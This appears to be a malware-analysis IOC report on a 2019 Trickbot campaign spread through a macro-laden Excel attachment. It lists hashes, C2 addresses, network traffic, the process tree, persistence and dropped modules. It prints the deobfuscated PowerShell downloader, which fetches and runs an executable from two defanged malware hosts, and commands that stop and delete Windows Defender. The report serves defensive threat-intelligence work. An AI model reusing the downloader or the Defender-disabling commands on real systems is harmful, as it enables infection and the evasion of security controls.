VRad

#trickbot_060219

Feb 7th, 2019
  1. #IOC #OptiData #VR #Trickbot #X97M #macro #powershell #obfuscated
  2.  
  3. https://pastebin.com/70KhU3a4
  4.  
  5. previous contact:
  6. 05/10/18 https://pastebin.com/75KNqwCf
  7. 02/10/18 https://pastebin.com/fm5Ug69G
  8. 24/09/18 https://pastebin.com/LjuNyGfn
  9.  
  10. FAQ:
  11. https://myonlinesecurity.co.uk/trickbot-via-fake-deloitte-canada-tax-billing/
  12. https://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/
  13. https://radetskiy.wordpress.com/?s=trickbot
  14.  
  15. attack_vector
  16. --------------
  17. email attachment (.xls, AutoExec macro) > cmd.exe > powershell (Base64 + GZip, IEX) > HTTPS GET, 2 URLs tried in order > $env:temp+'\tmp1806.exe' > start-process
  18.  
  19. email_headers
  20. --------------
  21. n/a
  22.  
  23. files
  24. --------------
  25. SHA-256 2f00e0bb89d863ee7834ae9cb69d98f8e826e6d328fcdd833d91d62634f675ce
  26. File name Tax_Billing.xls [Composite Document File V2 Document] Type: OLE, AutoExec
  27. File size 57.5 KB
  28.  
  29. SHA-256 1595ecbc00303503b974747aff928d2eacce9b249e0def2ea29ee12191cc6f1a
  30. File name pro.smoc (as served) > tmp1806.exe (as saved to %TEMP%) [PE32 executable (GUI) Intel 80386, for MS Windows]
  31. File size 313.64 KB
  32.  
  33. activity
  34. **************
  35.  
  36. deobfuscating_macro (stages separated by '@>': the macro's cmd line writes a .bat, the .bat runs PowerShell that Base64-decodes + GZip-inflates and IEXes the downloader script shown last)
  37. --------------
  38. cmd.exe /c powershell "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));
  39. IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
  40. '""| out-file -filepath %tmp%\tmp9388.bat -encoding ascii; cmd /c '%tmp%\tmp9388.bat'
  41.  
  42. @>
  43.  
  44. powershell "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('... Base64 string ...'));
  45. (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
  46.  
  47. @>
  48.  
  49. function <#release#> TurnOn([string] $pch1){$tuc1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
  50. (new-object system.net.webclient <#exim#> ).downloadfile($pch1,$env:temp+'\tmp1806.exe');}catch{$tuc1=0;}return $tuc1;}
  51. $fne1=@('jumpuprecords{.} com/pro.smoc','beersforgears{.} com/pro.smoc');
  52. foreach ($riw in $fne1){if(TurnOn('https://'+$riw) -eq 1){break;} };<#validate#>start-process ($env:temp+'\tmp1806.exe')
  53.  
  54. pl_src: 2 (payload URLs tried in order over HTTPS; note the script sets ServerCertificateValidationCallback={$true}, so an invalid or self-signed certificate would not stop the download; trailing number is presumably the HTTP status seen at time of check)
  55. --------------
  56. 69.27.37.10 jumpuprecords{.} com 404
  57. 192.254.185.228 beersforgears{.} com 404
  58.  
  59. C2: (HTTP POST beacons from the infected host, see netwrk below; the second one goes to port 8082)
  60. --------------
  61. 190.186.39.82
  62.  
  63. netwrk
  64. --------------
  65. ssl
  66. 69.27.37.10 jumpuprecords{.} com Client Hello
  67. 192.254.185.228 beersforgears{.} com Client Hello
  68.  
  69. http.request.method == POST (Wireshark display filter; the (!) marks the anomalous values in what appears to be the User-Agent field, 'Mozilla/4.0' and 'test')
  70. 190.186.39.82 190.186.39.82 POST /ser0205us/APM11_W617601.id/81/ HTTP/1.1 Mozilla/4.0 (!)
  71. 190.186.39.82 190.186.39.82:8082 POST /ser0205us/APM11_W617601.id/90 HTTP/1.1 test (!)
  72.  
  73. comp (process -> remote endpoint, netstat-style; note svchost.exe PID 1504 connecting to 89.46.223.121 on the non-standard port 447)
  74. --------------
  75. powershell.exe 1780 TCP 69.27.37.10 443 ESTABLISHED
  76. powershell.exe 1780 TCP 192.254.185.228 443 SYN_SENT
  77. svchost.exe 1504 TCP 46.21.249.220 443 ESTABLISHED
  78. svchost.exe 1504 TCP 2.21.243.40 80 ESTABLISHED
  79. svchost.exe 1504 TCP 47.52.62.55 443 SYN_SENT
  80. svchost.exe 1504 TCP 89.46.223.121 447 ESTABLISHED
  81.  
  82. svchost.exe 1504 TCP zimbabweemergencyassistance{.} com https ESTABLISHED
  83. svchost.exe 1504 TCP a2-21-243-40.deploy.static.akamaitechnologies{.} com http ESTABLISHED
  84.  
  85. proc (process tree, '@>' separates stages; in this sandbox %tmp% resolved to C:\tmp; note the Windows Defender tampering - sc stop/delete WinDefend and Set-MpPreference -DisableRealtimeMonitoring $true - run by tmp1806.exe and again by the persisted copy tnq1907.exe)
  86. --------------
  87. C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE /e
  88. C:\Windows\SysWOW64\cmd.exe /c powershell "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'""| out-file -filepath %tmp%\tmp9388.bat -encoding ascii; cmd /c '%tmp%\tmp9388.bat'
  89. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'""| out-file -filepath C:\tmp\tmp9388.bat -encoding ascii; cmd /c 'C:\tmp\tmp9388.bat'
  90. C:\Windows\SysWOW64\cmd.exe /c C:\tmp\tmp9388.bat
  91. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('... Base64 string ...'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
  92. @>
  93. C:\tmp\tmp1806.exe
  94. C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
  95. C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
  96. C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  97. @>
  98. C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
  99. C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
  100. C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
  101. C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  102. @>
  103. C:\Windows\system32\svchost.exe
  104. @>
  105. C:\Windows\system32\svchost.exe -k netsvcs
  106. C:\Windows\system32\taskeng.exe {BBC0F265-32F9-4766-909F-D34E8EEF3FFB} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
  107. C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
  108. C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
  109. C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
  110. C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  111. C:\Windows\system32\svchost.exe
  112.  
  113. persist
  114. --------------
  115. Task Scheduler (task \CleanMemoryWinTask launches the copy dropped under %APPDATA%\cleanmem; its execution via taskeng.exe is visible in proc above; date is dd.mm.yyyy)
  116. \CleanMemoryWinTask c:\users\operator\appdata\roaming\cleanmem\tnq1907.exe 06.02.2019 16:55
  117.  
  118. drop (files written under %APPDATA%\cleanmem; the *64 entries and their *_configs directories are presumably the bot's downloaded modules and their configs)
  119. --------------
  120. C:\Users\operator\AppData\Roaming\cleanmem\grabber_temp.INTEG.RAW
  121. C:\Users\operator\AppData\Roaming\cleanmem\tmp.edb
  122. C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
  123. C:\Users\operator\AppData\Roaming\cleanmem\vlc-qt-interface.ini
  124. C:\Users\operator\AppData\Roaming\cleanmem\injectDll64_configs
  125. C:\Users\operator\AppData\Roaming\cleanmem\mailsearcher64_configs
  126. C:\Users\operator\AppData\Roaming\cleanmem\networkDll64_configs
  127. C:\Users\operator\AppData\Roaming\cleanmem\psfin64_configs
  128. C:\Users\operator\AppData\Roaming\cleanmem\pwgrab64_configs
  129. C:\Users\operator\AppData\Roaming\cleanmem\importDll64
  130. C:\Users\operator\AppData\Roaming\cleanmem\injectDll64
  131. C:\Users\operator\AppData\Roaming\cleanmem\mailsearcher64
  132. C:\Users\operator\AppData\Roaming\cleanmem\networkDll64
  133. C:\Users\operator\AppData\Roaming\cleanmem\psfin64
  134. C:\Users\operator\AppData\Roaming\cleanmem\pwgrab64
  135. C:\Users\operator\AppData\Roaming\cleanmem\shareDll64
  136. C:\Users\operator\AppData\Roaming\cleanmem\systeminfo64
  137. C:\Users\operator\AppData\Roaming\cleanmem\wormwinDll64
  138.  
  139. # # #
  140. https://www.virustotal.com/#/file/2f00e0bb89d863ee7834ae9cb69d98f8e826e6d328fcdd833d91d62634f675ce/details
  141. https://www.virustotal.com/#/url/240554f90c39c2c914803a8ee2c295d5c848482f82138d20a236d6b71b2c823c/details
  142. https://www.virustotal.com/#/url/0b963e7eb53d1d7cbca89b53b376530a92abb5bf7a5fff97f100a0545545b34d/details
  143. https://urlhaus.abuse.ch/url/118629/
  144. https://urlhaus.abuse.ch/url/118628/
  145.  
  146. https://www.virustotal.com/#/file/1595ecbc00303503b974747aff928d2eacce9b249e0def2ea29ee12191cc6f1a/details
  147. https://analyze.intezer.com/#/analyses/66286e3c-deca-480c-9f36-caebee871a10
  148.  
  149. VR
  150.  
  151. @